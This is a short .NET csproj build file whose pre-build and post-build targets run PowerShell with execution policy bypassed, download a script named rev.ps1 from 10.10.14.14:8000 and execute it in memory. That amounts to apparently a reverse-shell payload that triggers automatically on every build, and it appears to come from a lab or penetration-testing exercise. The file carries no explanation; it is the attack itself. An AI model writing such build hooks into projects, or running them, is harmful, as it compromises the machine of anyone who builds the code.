<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
    <RunPostBuildEvent>Always</RunPostBuildEvent>
  </PropertyGroup>

  <Target Name="PostBuild" AfterTargets="PostBuildEvent">
    <Exec Command="c:\windows\system32\ping 10.10.14.14&#xD;&#xA;powershell -ep bypass &quot;iex((new-object net.webclient).downloadstring('http://10.10.14.14:8000/rev.ps1'))&quot;" />
  </Target>

  <Target Name="PreBuild" BeforeTargets="PreBuildEvent">
    <Exec Command="powershell -ep bypass &quot;iex((new-object net.webclient).downloadstring('http://10.10.14.14:8000/rev.ps1'))&quot;" />
  </Target>

</Project>
